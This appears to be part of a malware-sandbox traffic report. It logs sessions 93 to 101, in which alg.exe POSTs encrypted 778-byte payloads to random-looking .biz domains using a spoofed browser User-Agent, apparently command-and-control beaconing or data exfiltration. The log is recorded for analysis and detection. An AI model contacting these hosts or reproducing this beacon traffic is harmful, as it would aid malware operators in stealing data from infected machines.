                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  93192.168.2.55006944.221.84.105802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:12.548007011 CET357OUTPOST /herwmjqyyara HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: neazudmrq.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:12.548091888 CET778OUTData Raw: 1f c2 d4 1e 6e e5 78 4a fe 02 00 00 8f 07 22 7f df 8e 3b c4 60 83 95 b3 bb c6 af 03 bc df 1e 8d cc 9d c3 15 f2 75 f6 4c 2b 63 3d ff 63 e0 c6 74 45 4f 2f 5c 8c 98 fb e8 3f f5 91 0f 06 75 8e a5 0f 52 eb ba 8b 9d 81 2b 26 cc 7d 48 d7 26 c6 fd 4b 36
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: nxJ";`uL+c=ctEO/\?uR+&}H&K6M^GoGT|!d,WVS!tZ?{iFIM)Au~YXt3ZA|2<+AT/\CnDEga_>Zk#, AD~''
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:13.222980022 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:13 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=47d4f979fa8d43d7b8be7c763345abe0|155.94.241.188|1730130733|1730130733|0|1|0; path=/; domain=.neazudmrq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  94192.168.2.55007018.208.156.248802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:13.336462975 CET350OUTPOST /vtxunog HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: pgfsvwx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:13.336535931 CET778OUTData Raw: 16 cb 82 06 f1 7d e0 d0 fe 02 00 00 9c b4 e6 64 9b 7e 0a 8a 91 62 a9 91 69 36 10 02 62 94 3c d4 47 79 b7 e3 0c bc 3b 38 91 52 00 75 14 23 b1 20 0e 80 87 49 97 60 ac 38 80 81 28 36 85 1c ff b4 aa d3 8c 48 bb b0 fe ec 50 45 b5 4e 23 7c 36 71 7c dc
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: }d~bi6b<Gy;8Ru# I`8(6HPEN#|6q|Q<C44Bi,'4:sB1iVwSX+#JQ#gFZ3^l`haVG~=O9y>iT^APuzz749
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:13.998702049 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:13 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=f17e49057007e04b9e52997456a252a3|155.94.241.188|1730130733|1730130733|0|1|0; path=/; domain=.pgfsvwx.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  95192.168.2.55007147.129.31.212802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:14.020118952 CET355OUTPOST /ataqclhdwkpjy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: aatcwo.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:14.020148039 CET778OUTData Raw: dc 23 78 2e 5c 93 97 c3 fe 02 00 00 80 e3 88 53 65 f3 3f 78 46 b0 34 21 53 97 12 30 2e 0c 10 97 1e a0 cc a6 62 8b df 4e f5 a6 42 be bd 33 42 b0 dd f0 12 c1 11 2d c2 d7 d1 a8 7f 08 50 c8 d4 76 48 0e 60 6c e7 52 2c 54 84 e9 d1 e8 4d 58 82 5e c0 9d
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: #x.\Se?xF4!S0.bNB3B-PvH`lR,TMX^,{^KZ@?7aa~RH-S.nsimx |-{Dr8-'dPTz{GbeuJJ6W2[|bL@-J8Z
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:15.880515099 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:15 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=102f53bb9f6eea9d7b9d4432e372649d|155.94.241.188|1730130735|1730130735|0|1|0; path=/; domain=.aatcwo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:15.880718946 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:15 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=102f53bb9f6eea9d7b9d4432e372649d|155.94.241.188|1730130735|1730130735|0|1|0; path=/; domain=.aatcwo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  96192.168.2.55007218.208.156.248802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:15.902965069 CET353OUTPOST /ruuxvcxs HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: kcyvxytog.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:15.903019905 CET778OUTData Raw: c7 d1 92 27 8f ce dc c3 fe 02 00 00 a7 f4 05 4f 89 99 8e fc 60 a3 84 df 4f 3c 69 e5 6f 2f f2 29 c9 c6 ca 75 34 fe 78 8c 62 b4 02 42 45 9d 08 c4 59 10 62 bc 25 e2 ab ca 57 bf 05 b9 10 66 f9 d1 63 9e 33 ce 0d d1 79 b4 50 3d e4 6b ef c2 08 23 41 6d
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 'O`O<io/)u4xbBEYb%Wfc3yP=k#AmiNBt#bce@Zv+mDC#c]4H)5"i4K]T0_t#GclT0/.^Jcx%>cvJH*S;$:c*R
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:16.570225000 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:16 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=8b721e60349fffd3b19fb018a1a9b8cf|155.94.241.188|1730130736|1730130736|0|1|0; path=/; domain=.kcyvxytog.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  97192.168.2.55007354.244.188.177802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:16.592303991 CET355OUTPOST /exbxilbdfwja HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: nwdnxrd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:16.592336893 CET778OUTData Raw: 8b 2c bf 4f b0 8d 6a 25 fe 02 00 00 58 7a 05 c0 8b dc 7e 47 be 7f 11 c1 2b dc 1b a5 0c e5 6b 0a 36 05 f8 73 30 4a 83 b1 9a 5a 8d 5f 43 1f dc 75 b9 f6 36 ac d8 ee f5 ba 80 81 a2 51 f4 54 91 84 f0 ae e3 04 a2 0f 99 7e c0 ef 2d bf 1e 4d 2f ec 00 5b
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: ,Oj%Xz~G+k6s0JZ_Cu6QT~-M/[va`#Eq+GyMoqYqV6`ly!;oox+^R{LgX1hz :%H(xc7Ys4r_:Z^!i6G:GTKe4
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:17.427901030 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:17 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=250ad26713d244d7ad73c10e237e14e3|155.94.241.188|1730130737|1730130737|0|1|0; path=/; domain=.nwdnxrd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  98192.168.2.55007418.246.231.120802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:17.449295044 CET347OUTPOST /htae HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: ereplfx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:17.449332952 CET778OUTData Raw: 83 19 33 01 36 e9 4e 54 fe 02 00 00 e4 48 ea 75 29 f7 14 11 54 3e 17 67 df 5b dc db f4 3e 9f 14 44 86 f2 27 48 06 7c 06 95 ef 65 dd 03 b2 54 88 c1 38 c1 e0 53 7f 08 25 8e d7 61 55 be 90 c4 83 10 44 6d ac 81 f2 1f 7a ed 8d 12 dc 77 7a b7 2b b8 7a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 36NTHu)T>g[>D'H|eT8S%aUDmzwz+zd&d-)KID&#2lXln^$E]n&b:Mdx7v9c#73sYpT+-7{a)p iU9'=GVA.Y'}>%|[Sp[0
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:18.271089077 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:18 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=4a2f35b072c3b9f914bf45de635a9494|155.94.241.188|1730130738|1730130738|0|1|0; path=/; domain=.ereplfx.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  99192.168.2.55007518.141.10.107802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:18.294682026 CET346OUTPOST /vkhuh HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: ptrim.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:18.294738054 CET778OUTData Raw: 44 44 5b bf c8 82 82 e8 fe 02 00 00 dd 5d 67 bd ab 1a 8d 51 66 5d dc 4a 41 86 5c e3 9c 07 63 a6 4f c0 e7 91 d1 10 a9 1b 46 a9 d7 86 5a 84 60 99 12 e4 2d 26 5e 22 39 b4 b5 39 97 06 ca 13 9f 22 63 bf 4e 93 7a ec 7f 99 c0 56 96 2a f8 64 0d 3b 1f 40
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: DD[]gQf]JA\cOFZ`-&^"99"cNzV*d;@W^UY [/*KC!|#2=.:*ym8{?r[v-,f0^s/QK;)[_<O3G\l]^*{bMoKrrnG? PIYB
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:20.084760904 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:19 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=e19b52423f1ec9acccd375d107203c1c|155.94.241.188|1730130739|1730130739|0|1|0; path=/; domain=.ptrim.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:20.084997892 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:19 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=e19b52423f1ec9acccd375d107203c1c|155.94.241.188|1730130739|1730130739|0|1|0; path=/; domain=.ptrim.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  100192.168.2.55007647.129.31.212802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:20.104408026 CET350OUTPOST /wtmpt HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: znwbniskf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:20.104423046 CET778OUTData Raw: 64 d1 fa e3 eb bb fc da fe 02 00 00 3a c0 ee 08 33 54 71 ec 77 d7 6a 42 15 5e eb a6 11 d5 cf f5 41 68 46 8a 2e 20 13 ab 0b bb c2 e2 00 26 47 0e 72 1a c9 05 45 c0 81 ec 13 45 18 57 f5 73 81 f0 ca 47 9d da c3 57 d3 5b 84 06 db 07 96 c2 0a cf 6c 93
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: d:3TqwjB^AhF. &GrEEWsGW[l'!2qsT([7533fI_<wX=)zb<KGt|LIk`z{i:X{=ss6h~F<\TW+#HJS9%)N:_L
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:21.532591105 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:21 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=3baea37bd29011a9f10616e28caeef1c|155.94.241.188|1730130741|1730130741|0|1|0; path=/; domain=.znwbniskf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  101192.168.2.55007744.221.84.105802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:21.555071115 CET357OUTPOST /neaxbjvxiqaxty HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: cpclnad.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:21.555151939 CET778OUTData Raw: ed 6b 1b fd 30 fe 93 48 fe 02 00 00 e3 21 c0 6c 3e f2 42 7d 06 61 87 a2 bc ac bb 79 1c c3 05 8b c0 ed af 19 8c 80 92 56 fb ea c7 07 8e fe 77 90 be ef b1 2e ab 2d d7 70 03 36 cd c5 f6 0f ca a0 9c bb 1b 99 fb 37 b4 58 0e 05 25 7e 97 d4 3d fb ba a7
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: k0H!l>B}ayVw.-p67X%~=#,7dyjDEJ%(/,n6k`>"BtVtiiVkt78Dw+$"p$ZkC]iD5Nlyd0&Y|$4&MZ@
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.219712019 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:22 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=bf92a9e77f2ce96a0d9b77eb4a3f7858|155.94.241.188|1730130742|1730130742|0|1|0; path=/; domain=.cpclnad.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
